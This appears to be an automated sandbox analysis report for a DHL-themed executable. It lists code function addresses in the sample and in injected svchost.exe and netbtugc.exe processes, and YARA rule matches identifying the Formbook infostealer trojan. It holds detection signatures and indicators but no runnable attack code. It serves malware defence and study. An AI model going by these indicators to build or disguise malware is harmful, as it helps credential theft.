Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A691C0	0_2_00A691C0
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A7B119	0_2_00A7B119
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A81394	0_2_00A81394
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A81706	0_2_00A81706
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A8781B	0_2_00A8781B
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A819B0	0_2_00A819B0
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A67920	0_2_00A67920
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A7997D	0_2_00A7997D
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A87A4A	0_2_00A87A4A
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A87CA7	0_2_00A87CA7
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A81C77	0_2_00A81C77
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A99EEE	0_2_00A99EEE
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AEBE44	0_2_00AEBE44
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A81F32	0_2_00A81F32
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_0168FC98	0_2_0168FC98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02601290	2_2_02601290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02616871	2_2_02616871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02616873	2_2_02616873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026028A0	2_2_026028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02610173	2_2_02610173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02601110	2_2_02601110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0260E1F3	2_2_0260E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026026A0	2_2_026026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0260268A	2_2_0260268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02602698	2_2_02602698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0260FF4A	2_2_0260FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0262D753	2_2_0262D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0260FF53	2_2_0260FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02603500	2_2_02603500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031003E6	2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C02C0	2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030100	2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F41A2	2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031001AA	2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F81CC	2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064750	2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C6E0	2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03100591	2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4420	2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F2446	2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EE4F6	2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F6BD7	2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310A9A6	2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304A840	2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030268B8	2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E8F0	2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03082F28	2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060F30	2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E2F30	2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40	2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BEFA0	2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032FC8	2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304CFE0	2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEE26	2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040E59	2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052E90	2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FCE93	2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEEDB	2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304AD00	2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DCD1F	2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03058DBF	2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303ADE0	2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040C00	2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0CB5	2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030CF2	2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F132D	2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302D34C	2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0308739A	2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030452A0	2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B2C0	2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E12ED	2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307516C	2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302F172	2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310B16B	2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304B1B0	2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EF0CC	2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030470C0	2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F70E9	2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF0E0	2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF7B0	2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085630	2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F16CC	2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7571	2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DD5B0	2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031095C3	2_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF43F	2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03031460	2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFB76	2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FB80	2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B5BF0	2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307DBF9	2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFA49	2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7A46	2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B3A6C	2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DDAAC	2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085AA0	2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E1AA3	2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EDAC6	2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D5910	2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049950	2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B950	2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AD800	2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030438E0	2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFF09	2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03041F92	2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFFB1	2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03003FD2	2_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03003FD5	2_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049EB0	2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03043D40	2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F1D5A	2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7D73	2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FDC0	2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B9C32	2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFCF2	2_2_030FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344A352	4_2_0344A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034503E6	4_2_034503E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0339E3F0	4_2_0339E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03430274	4_2_03430274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034102C0	4_2_034102C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03418158	4_2_03418158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03380100	4_2_03380100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0342A118	4_2_0342A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034481CC	4_2_034481CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034441A2	4_2_034441A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034501AA	4_2_034501AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03422000	4_2_03422000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03390770	4_2_03390770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033B4750	4_2_033B4750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0338C7C0	4_2_0338C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033AC6E0	4_2_033AC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03390535	4_2_03390535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03450591	4_2_03450591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03442446	4_2_03442446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03434420	4_2_03434420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0343E4F6	4_2_0343E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344AB40	4_2_0344AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03446BD7	4_2_03446BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0338EA80	4_2_0338EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033A6962	4_2_033A6962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033929A0	4_2_033929A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0345A9A6	4_2_0345A9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03392840	4_2_03392840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0339A840	4_2_0339A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033768B8	4_2_033768B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033BE8F0	4_2_033BE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03404F40	4_2_03404F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033B0F30	4_2_033B0F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033D2F28	4_2_033D2F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03432F30	4_2_03432F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0339CFE0	4_2_0339CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0340EFA0	4_2_0340EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03382FC8	4_2_03382FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03390E59	4_2_03390E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344EE26	4_2_0344EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344EEDB	4_2_0344EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033A2E90	4_2_033A2E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344CE93	4_2_0344CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0339AD00	4_2_0339AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0342CD1F	4_2_0342CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033A8DBF	4_2_033A8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0338ADE0	4_2_0338ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03390C00	4_2_03390C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03380CF2	4_2_03380CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03430CB5	4_2_03430CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344132D	4_2_0344132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0337D34C	4_2_0337D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033D739A	4_2_033D739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033952A0	4_2_033952A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034312ED	4_2_034312ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033AB2C0	4_2_033AB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0345B16B	4_2_0345B16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0337F172	4_2_0337F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033C516C	4_2_033C516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0339B1B0	4_2_0339B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0343F0CC	4_2_0343F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344F0E0	4_2_0344F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034470E9	4_2_034470E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033970C0	4_2_033970C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344F7B0	4_2_0344F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033D5630	4_2_033D5630
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_034416CC	4_2_034416CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03447571	4_2_03447571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0342D5B0	4_2_0342D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03381460	4_2_03381460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344F43F	4_2_0344F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344FB76	4_2_0344FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03405BF0	4_2_03405BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033AFB80	4_2_033AFB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033CDBF9	4_2_033CDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03447A46	4_2_03447A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344FA49	4_2_0344FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03403A6C	4_2_03403A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0343DAC6	4_2_0343DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033D5AA0	4_2_033D5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03431AA3	4_2_03431AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0342DAAC	4_2_0342DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03425910	4_2_03425910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03399950	4_2_03399950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033AB950	4_2_033AB950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033FD800	4_2_033FD800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033938E0	4_2_033938E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344FF09	4_2_0344FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03391F92	4_2_03391F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344FFB1	4_2_0344FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03399EB0	4_2_03399EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03441D5A	4_2_03441D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03447D73	4_2_03447D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03393D40	4_2_03393D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033AFDC0	4_2_033AFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03409C32	4_2_03409C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0344FCF2	4_2_0344FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_008015E0	4_2_008015E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_007FC7D0	4_2_007FC7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_007FC7C7	4_2_007FC7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_007FC9F0	4_2_007FC9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_007FAA70	4_2_007FAA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_008030EE	4_2_008030EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_008030F0	4_2_008030F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00819FD0	4_2_00819FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309A0AF	4_2_0309A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309B9D6	4_2_0309B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309B8B4	4_2_0309B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309BD6C	4_2_0309BD6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309ADD8	4_2_0309ADD8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 110 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 033D7E54 appears 104 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0337B970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 033FEA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0340F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 033C5130 appears 58 times
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: String function: 00A7F9F2 appears 40 times
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: String function: 00A69CB3 appears 31 times
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: String function: 00A80A30 appears 46 times
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: String function: 00A84963 appears 31 times

Source: DHL 745-12302024.exe, 00000000.00000003.1419355406.0000000003DF3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 745-12302024.exe
Source: DHL 745-12302024.exe, 00000000.00000003.1417265980.000000000410D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL 745-12302024.exe

Source: DHL 745-12302024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
